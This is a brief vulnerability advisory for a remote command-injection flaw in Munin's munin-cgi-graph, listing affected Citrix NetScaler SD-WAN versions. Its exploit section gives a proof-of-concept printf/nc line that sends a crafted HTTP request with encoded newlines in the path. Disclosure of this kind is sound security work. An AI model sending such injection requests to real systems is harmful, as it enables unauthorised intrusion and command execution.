Munin is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application.
Information
Citrix NetScaler SD-WAN 10.1.1
Citrix NetScaler SD-WAN 10.0.4
Citrix NetScaler SD-WAN 9.3.6
Exploit
The following example input is available:
printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80
References:
- Munin Homepage (Munin)
- munin-cgi-graph: enables injecting arbitrary strings into munin-cgi-graph.log (Helmut Grohne)
- Citrix SD-WAN Multiple Security Updates (Citrix)